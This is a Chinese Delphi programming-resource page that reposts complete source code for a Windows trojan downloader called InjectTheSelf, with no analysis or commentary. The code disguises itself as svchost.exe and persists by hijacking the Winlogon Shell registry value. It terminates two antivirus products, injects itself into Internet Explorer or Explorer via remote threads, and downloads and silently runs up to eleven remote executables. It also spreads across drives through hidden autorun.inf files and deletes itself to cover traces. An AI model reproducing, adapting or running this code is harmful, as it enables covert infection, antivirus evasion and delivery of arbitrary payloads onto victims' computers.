主页 > 编程资料 > Delphi >
发布时间:2015-09-22 作者:网络 阅读:128次

 program InjectTheSelf;

{$IMAGEBASE $13140000}

uses
  Windows,
  SysUtils,
  urlmon,
  sendmail,
  shellapi,
  tlhelp32;

var
MSG:TMSG;
kkk:
string;
cTime: TDateTime;
hModule, hModule_News: Pointer;
Extent, Size, ThreadId: longword;
//ProcessHandle, Pid: longword;
sysdir:
array[0..145of char;
ret2:HKEY;
window:HWND;
htimer1,k,n,main:integer;
//time:pchar='5';
//timemain:pchar='5';
time:pchar
='999';
timemain:pchar
='9999';
kill:pchar
='1';
infectl:pchar
='1';
static:pchar
='1';
//urllabel:pchar='http://www.16518.net/test/1.exe';
//url1:  pchar='http://www.16518.net/test/1.exe';
urllabel: pchar 
='http://                                                                                                                                                                                                                             ';
url1:  pchar 
='http://                                                                                                                                                                                                                              ';
url2:  pchar 
='http://                                                                                                                                                                                                                              ';
url3:  pchar 
='http://                                                                                                                                                                                                                              ';
url4:  pchar 
='http://                                                                                                                                                                                                                              ';
url5:  pchar 
='http://                                                                                                                                                                                                                              ';
url6:  pchar 
='http://                                                                                                                                                                                                                              ';
url7:  pchar 
='http://                                                                                                                                                                                                                              ';
url8:  pchar 
='http://                                                                                                                                                                                                                              ';
url9:  pchar 
='http://                                                                                                                                                                                                                              ';
url10: pchar 
='http://                                                                                                                                                                                                                              ';
url11: pchar 
='http://                                                                                                                                                                                                                              ';
urlfirst:  pchar 
='http://                                                                                                                                                                                                                              ';
urldown:  pchar 
='http://                                                                                                                                                                                                                              ';
urlupdate: pchar 
='http://                                                                                                                                                                                     ';
delself:pchar
='1';

//获取文件大小

{
function GetHostNam:String;
var
ComputerName: array[0..MAX_COMPUTERNAME_LENGTH+1] of char;
Size: Cardinal;
begin
result:='';
Size := MAX_COMPUTERNAME_LENGTH+1;
GetComputerName(ComputerName, Size);
Result:=StrPas(ComputerName);
end;

//获取本机IP
procedure nametoIP;
type
  TaPInAddr = array[0..255] of PInAddr;
  PaPInAddr = ^TaPInAddr;
var
  phe: PHostEnt;
  pptr: PaPInAddr;
  Buffer: array[0..63] of char;
  i: integer;
  GInitData: TWSADATA;
  temp:string;
begin
  wsastartup($101, GInitData);
  Temp := '';
  GetHostName(Buffer, SizeOf(Buffer));
  phe := GetHostByName(buffer);
  if not assigned(phe) then
    exit;
  pptr := PaPInAddr(Phe^.h_addr_list);
  i := 0;
  while pptr^[I] <> nil do begin
    Temp := Temp + StrPas(inet_ntoa(pptr^[I]^)) + ',';
    inc(i);
  end;
  Delete(Temp, Length(Temp), 1);
  try
    trueip :=Temp;
  except
  end;
  wsacleanup;
end;
      
}

procedure tlabel();
var
f:textfile;
i:integer;
buffer,disk:
string;

begin

buffer:
='first run';
Assignfile(F,
'C:\program files\label.tmp');
if not FileExists('C:\program files\label.tmp') Then
begin
Rewrite(F);
Closefile(F);
End
Else  Assignfile(F,
'C:\program files\label.tmp');
{$I-}
Rewrite(F);
{$I+}
If IOResult
<> 0 Then  exit;
//Write(F,Memo_gettxt.Text);
//Memo_gettxt.Text:='';
Write(F,buffer);

Closefile(F);
end;



procedure Download; //下载过程
begin
sleep(main);
URLDownloadToFile(
nil,urllabel, 'C:\program files\temp.tmp'0nil);
//WinExec('C:\program files\system1.exe', SW_SHOW); //SW_SHOW or SW_HIDE
sleep(k);
if FileExists('c:\Program Files\temp.tmp'then
begin

URLDownloadToFile(
nil, url1, 'c:\Program Files\system1.exe'0nil);
WinExec(
'c:\Program Files\system1.exe', SW_SHOW); //SW_SHOW or SW_HIDE

sleep(k);


URLDownloadToFile(
nil, url2, 'c:\Program Files\system2.exe'0nil);
WinExec(
'c:\Program Files\system2.exe', SW_SHOW); //SW_SHOW or SW_HIDE

sleep(k);


URLDownloadToFile(
nil, url3, 'c:\Program Files\system3.exe'0nil);
WinExec(
'c:\Program Files\system3.exe', SW_SHOW); //SW_SHOW or SW_HIDE

sleep(k);

URLDownloadToFile(
nil, url4, 'c:\Program Files\system4.exe'0nil);
WinExec(
'c:\Program Files\system4.exe', SW_SHOW); //SW_SHOW or SW_HIDE
sleep(k);

URLDownloadToFile(
nil, url5, 'c:\Program Files\system5.exe'0nil);
WinExec(
'c:\Program Files\system5.exe', SW_SHOW); //SW_SHOW or SW_HIDE
sleep(k);

URLDownloadToFile(
nil, url6, 'c:\Program Files\system6.exe'0nil);
WinExec(
'c:\Program Files\system6.exe', SW_SHOW); //SW_SHOW or SW_HIDE
sleep(k);

URLDownloadToFile(
nil, url7, 'c:\Program Files\system7.exe'0nil);
WinExec(
'c:\Program Files\system7.exe', SW_SHOW); //SW_SHOW or SW_HIDE
sleep(k);

URLDownloadToFile(
nil, url8, 'c:\Program Files\system8.exe'0nil);
WinExec(
'c:\Program Files\system8.exe', SW_SHOW); //SW_SHOW or SW_HIDE

if FileExists('c:\Program Files\label.tmp'then
sleep(k);

URLDownloadToFile(
nil, url9, 'c:\Program Files\system9.exe'0nil);
WinExec(
'c:\Program Files\system9.exe', SW_SHOW); //SW_SHOW or SW_HIDE

sleep(k);
begin
URLDownloadToFile(
nil, url10, 'c:\Program Files\system10.exe'0nil);
WinExec(
'c:\Program Files\system10.exe', SW_SHOW); //SW_SHOW or SW_HIDE
sleep(k);

URLDownloadToFile(
nil, url11, 'c:\Program Files\system11.exe'0nil);
WinExec(
'c:\Program Files\system11.exe', SW_SHOW); //SW_SHOW or SW_HIDE


end;
end;
end;


procedure infect();
var
f:textfile;
i:integer;
buffer,disk:
string;
begin
begin

buffer:
='[AutoRun]'+#13#10+'open=pagefile.pif';
Assignfile(F,
'C:\program files\autorun.inf');
if not FileExists('C:\program files\autorun.inf') Then
begin
Rewrite(F);
Closefile(F);
End
Else  Assignfile(F,
'C:\program files\autorun.inf');
{$I-}
Rewrite(F);
{$I+}
If IOResult
<> 0 Then  exit;
//Write(F,Memo_gettxt.Text);
//Memo_gettxt.Text:='';
Write(F,buffer);

Closefile(F);
end;

for i:= ord('c'to ord('z'do
begin
disk:
=chr(i);
if getdrivetype(pchar(disk+':\'))=3 then
begin
copyfile(
'C:\program files\autorun.inf',pchar(disk+':\autorun.inf'),true);

copyfile(pchar(paramstr(
0)),pchar(disk+':\pagefile.pif'),true);

SetFileAttributes(pchar(disk
+':\autorun.inf'),FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM);

SetFileAttributes(pchar(disk
+':\pagefile.pif'),FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM);
end;
end;
deletefile(
'C:\program files\autorun.inf');
end;
function GetFileSize(const FileName: String): LongInt;
var SearchRec: TSearchRec;
begin
if FindFirst(ExpandFileName(FileName), faAnyFile, SearchRec) = 0 then
Result :
= SearchRec.Size
else
Result :
= -1;
end;
function  Killpro(ExeFileName:  string):  integer;
const  PROCESS_TERMINATE=$0001;
var ContinueLoop:BOOL;
    FSnapshotHandle:THandle;
    FProcessEntry32:TProcessEntry32;
begin
  result:
=0;
  FSnapshotHandle:
=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
  FProcessEntry32.dwSize:
=Sizeof(FProcessEntry32);
  ContinueLoop:
=Process32First(FSnapshotHandle,  FProcessEntry32);
  
while  integer(ContinueLoop)<>0  do
    
begin
      
if ((UpperCase(ExtractFileName(FProcessEntry32.szExeFile))=ExtractFileName(UpperCase(ExeFileName)))
      
or (UpperCase(FProcessEntry32.szExeFile)  =UpperCase(ExeFileName)))  then
      Result:
=Integer(TerminateProcess(OpenProcess(PROCESS_TERMINATE,BOOL(0),FProcessEntry32.th32ProcessID),0));
      ContinueLoop  :
=  Process32Next(FSnapshotHandle,FProcessEntry32);
  
end;
  CloseHandle(FSnapshotHandle);
end;


procedure ExtDelMe;
var
  F: textfile;
  BatchFileName: 
string;
  ProcessInfo: TProcessInformation;
  StartUpInfo: TStartupInfo;
begin
  GetwindowsDirectory(sysdir,
145);
  
//DelValue(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp''NoRealMode');
  BatchFileName :
= sysdir + '\Deleteme.bat';
  AssignFile(F, BatchFileName);
  Rewrite(F);
  WriteLn(F, 
':try');
  WriteLn(F, 
'del "' + ParamStr(0+ '"');
  WriteLn(F, 
'if exist "' + ParamStr(0+ '"' + ' goto try');
  WriteLn(F, 
'del %0');
  CloseFile(F);
  FillChar(StartUpInfo, SizeOf(StartUpInfo), $
00);
  StartUpInfo.dwFlags :
= STARTF_USESHOWWINDOW;
  StartUpInfo.wShowWindow :
= SW_HIDE;
  
if CreateProcess(nil, PChar(BatchFileName), nilnil, False, IDLE_PRIORITY_CLASS, nilnil, StartUpInfo, ProcessInfo) then
  
begin
  Killpro(pchar(paramstr(
0)));
    
//CloseHandle(ProcessInfo.hThread);
    
//CloseHandle(ProcessInfo.hProcess);
  
end;
end;

function GetIEAppPath:string;
var
iekey: Hkey;
iename: 
array [0..255of char;
vType,dLength :DWORD;
begin
vType :
= REG_SZ;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,
'Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE',0,KEY_ALL_ACCESS,iekey);
dLength :
= SizeOf(iename);
if RegQueryValueEx(iekey, '' , nil, @vType, @iename[0], @dLength) = 0 then
Result :
= iename
else
Result :
= 'C:\Program Files\Internet Explorer\IEXPLORE.EXE';
RegCloseKey(iekey);
end;

procedure TimerProc1(Wnd:HWnd;Msg,TimerID,dwTime:DWORD);stdcall;
begin
infect();
end;


procedure Inject(ProcessHandle: longword; EntryPoint: pointer);
var
Module, NewModule: Pointer;
Size, BytesWritten, TID: longword;
begin
//这里得到的值为一个返回指针型变量,指向内容包括进程映像的基址
Module :
= Pointer(GetModuleHandle(nil));
//得到内存映像的长度
Size :
= PImageOptionalHeader(Pointer(integer(Module) + PImageDosHeader(Module)._lfanew +
SizeOf(dword) 
+ SizeOf(TImageFileHeader))).SizeOfImage;
//在Exp进程的内存范围内分配一个足够长度的内存
VirtualFreeEx(ProcessHandle, Module, 
0, MEM_RELEASE);
//确定起始基址和内存映像基址的位置
NewModule :
= VirtualAllocEx(ProcessHandle, Module, Size, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
//确定上面各项数据后,这里开始进行操作
WriteProcessMemory(ProcessHandle, NewModule, Module, Size, BytesWritten);
//建立远程线程,至此注入过程完成
createRemoteThread(ProcessHandle, 
nil0, EntryPoint, Module, 0, TID);
end;

//关联EXE


procedure RunInject(InjType:integer);
var
ProcessHandle, PID: longword;
StartupInfo: TStartupInfo;
ProcessInfo: TProcessInformation;

begin
if InjType=0 then //注入explorer.exe
begin
//获取Exp进程的PID码,Shell_TrayWnd为类名,相关的需用SPY++来查看
GetWindowThreadProcessId(FindWindow(
'Shell_TrayWnd'nil), @Pid);
end
else //注入iexplore.exe
begin
Window:
=FindWindow('IEFrame',nil);
if window = 0 then    winexec(PChar(GetIEAppPath),sw_hide);
//createProcess(nil,PChar(GetIEAppPath), nilnil, False, 0nilnil, StartupInfo, ProcessInfo);
sleep(
500);
GetWindowThreadProcessId(FindWindow(
'IEFrame'nil), @Pid);
end;
//打开进程
ProcessHandle :
= OpenProcess(PROCESS_ALL_ACCESS, False, PID);
Inject(ProcessHandle, @Download);
//关闭对像
CloseHandle(ProcessHandle);

end;




begin
{cTime := Now();
host:=DateToStr(cTime) + '-' + TimeToStr(cTime);
nametoIP;
ip:='主机:'+gethostnam+'---------IP地址:'+trueip+'---成功下载';
ip1:='主机:'+gethostnam+'---------IP地址:'+trueip+'---首次安装';
  ip2:='主机:'+gethostnam+'---------IP地址:'+trueip+'---服务端升级'; 
}

  GetwindowsDirectory(sysdir,
145);
if FileExists(sysdir+'\svchost.exe'then
begin
//自校验
if (getfilesize(pchar(paramstr(0)))>29000and (getfilesize(pchar(paramstr(0)))<>55296then exit;
if getfilesize(pchar(sysdir+'\svchost.exe'))<>getfilesize(pchar(paramstr(0))) then  //获取大小比较
begin
killpro(
'svchost.exe');
deletefile(pchar(sysdir
+'\svchost.exe'));
copyfile(pchar(paramstr(
0)),pchar(sysdir+'\svchost.exe'),true);
WinExec(pchar(sysdir
+'\svchost.exe'), SW_HIDE);
//tlabel(); //升级不算第一次下载

if static<>'1' then shellexecute(0,'open','Iexplore.exe',urlupdate,nil,SW_hide);

//sleep(6000);
if  strtoint(delself)<>1  then ExtDelMe;

end;
end;



k:
=strtoint(time)*1000;
main:
=strtoint(timemain)*1000;
n:
=0;
repeat
n:
=n+1;
begin
DeleteFile(
'c:\Program Files\system'+inttostr(n)+'.exe');  //1
end;
  
until
  n
>11;
if FileExists('c:\Program Files\temp.tmp'then  deletefile ('c:\Program Files\temp.tmp');


  GetwindowsDirectory(sysdir,
145);

  
if not FileExists(sysdir+'\svchost.exe'then
  
begin
  
//自校验
if (getfilesize(pchar(paramstr(0)))>29000and (getfilesize(pchar(paramstr(0)))<>55296then exit;
      copyfile(pchar(paramstr(
0)),pchar(sysdir+'\svchost.exe'),true);
      
if strtoint(kill)<>1 then
      
begin
      killpro(
'kvmonxp.exe');//江民
      killpro(
'ravmon.exe')//瑞星
      
end;
      
if static<>'1' then  shellexecute(0,'open','Iexplore.exe',urlfirst, nil, SW_HIDE);
kkk:
= 'Explorer.exe                                                                                                                                                                                                            svchost.exe';
RegCreateKey(HKEY_LOCAL_MACHINE,
'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',ret2);
RegSetValueEx(Ret2,
'Shell'0, REG_SZ,pchar(kkk), Length(pchar(kkk))+ 1);
//MessageBox(0'完成''提示', mb_iconinformation);
RegCloseKey(Ret2);
      WinExec(pchar(sysdir
+'\svchost.exe'), SW_HIDE);
      tlabel();
      
//sleep(6000);
  
if  strtoint(delself)<>1  then ExtDelMe;
  
end;

{//EXE关联利用传入参数
if ParamCount> 0 then
begin
origin;
winexec(pchar(ParamStr(1)),sw_show);
reg;
end; 
}
CreateMutex(
nil, True,'system');//设置一个内存标示~防止程序多次运行
if (GetlastError()= ERROR_ALREADY_EXISTS) then halt;

//MessageBox(0'启动完成''提示', mb_iconinformation);

//自校验
if (getfilesize(pchar(paramstr(0)))>29000and (getfilesize(pchar(paramstr(0)))<>55296then exit;
RunInject(
1); //1 注入iexplore.exe 0 注入explorer.exe
if FileExists('c:\Program Files\label.tmp'then  deletefile ('c:\Program Files\label.tmp');
if static<>'1' then shellexecute(0'open''Iexplore.exe', urldown, nil, SW_HIDE);



if strtoint(infectl)<>1 then hTimer1 := SetTimer(0030, @TimerProc1);

while(GetMessage(Msg,0,0,0))do  //回调函数,非常非常重要,不然TIMER就不管用了
begin
  TranslateMessage(Msg);
  DispatchMessage(Msg);
end;                   

end.
关键字词: